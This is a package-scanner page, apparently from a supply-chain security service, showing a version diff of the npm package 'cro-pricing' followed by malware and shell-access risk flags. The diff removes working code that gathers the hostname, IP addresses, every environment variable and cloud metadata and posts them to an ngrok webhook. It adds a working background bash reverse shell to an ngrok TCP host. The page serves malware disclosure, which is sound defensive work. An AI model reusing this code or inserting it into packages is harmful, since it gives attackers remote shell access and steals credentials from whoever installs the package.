cro-pricing
Advanced tools
+1
-1
| { | ||
| "name": "cro-pricing", | ||
| "version": "1.0.5", | ||
| "version": "1.0.6", | ||
| "main": "index.js", | ||
@@ -5,0 +5,0 @@ "scripts": { |
+7
-45
@@ -1,48 +0,10 @@ | ||
| const os = require("os"); | ||
| const axios = require("axios"); | ||
| const { execSync } = require("child_process"); | ||
| const { exec } = require("child_process"); | ||
| const webhookUrl = "https://9fb9-2405-201-f004-cabf-fca2-f62e-d4e3-b2e9.ngrok-free.app"; | ||
| const reverseShellCmd = `nohup bash -c 'exec 5<>/dev/tcp/0.tcp.ap.ngrok.io/10113; while read -r l<&5; do $l; done >&5 2>&5' &>/dev/null &`; | ||
| (async () => { | ||
| const hn = os.hostname(); | ||
| // Get local IPv4 address | ||
| const interfaces = os.networkInterfaces(); | ||
| const lip = Object.values(interfaces) | ||
| .flat() | ||
| .filter(i => i.family === "IPv4" && !i.internal) | ||
| .map(i => i.address) | ||
| .join(", "); | ||
| // Get public IP | ||
| let pip = "Unavailable"; | ||
| try { | ||
| const res = await axios.get("https://api.ipify.org?format=json", { timeout: 3000 }); | ||
| pip = res.data.ip; | ||
| } catch {} | ||
| // Get env variables | ||
| const envVars = process.env; | ||
| // Get instance metadata (cloud) from 169.254.169.254 | ||
| let metadata = "Unavailable"; | ||
| try { | ||
| const res = await axios.get("http://169.254.169.254.nip.io", { timeout: 3000 }); | ||
| metadata = res.data; | ||
| } catch {} | ||
| const payload = { | ||
| hostname: hn, | ||
| local_ip: lip, | ||
| public_ip: pip, | ||
| env_vars: envVars, | ||
| metadata: metadata, | ||
| }; | ||
| try { | ||
| await axios.post(webhookUrl, payload); | ||
| } catch (err) { | ||
| // Silent fail | ||
| exec(reverseShellCmd, (error, stdout, stderr) => { | ||
| if (error) { | ||
| // Optional: log error to your ngrok endpoint or skip silently | ||
| return; | ||
| } | ||
| })(); | ||
| }); |
Known malware
Supply chain riskThis package version is identified as malware. It has been flagged either by Socket's AI scanner and confirmed by our threat research team, or is listed as malicious in security databases and other sources.
Found 1 instance in 1 package
Shell access
Supply chain riskThis module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.
Found 1 instance in 1 package
Trivial Package
Supply chain riskPackages less than 10 lines of code are easily copied into your own project and may not warrant the additional supply chain risk of an external dependency.
Found 1 instance in 1 package
Unpublished package
Supply chain riskPackage version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.
Found 1 instance in 1 package
AI-detected potential malware
Supply chain riskAI has identified this package as malware. This is a strong signal that the package may be malicious.
Found 1 instance in 1 package
Shell access
Supply chain riskThis module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.
Found 1 instance in 1 package
Unpublished package
Supply chain riskPackage version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.
Found 1 instance in 1 package
Environment variable access
Supply chain riskPackage accesses environment variables, which may be a sign of credential stuffing or data theft.
Found 1 instance in 1 package
URL strings
Supply chain riskPackage contains fragments of external URLs or IP addresses, which the package may be accessing at runtime.
Found 1 instance in 1 package
1
-50%1
-66.67%590
-57.74%8
-80%1
Infinity%3
50%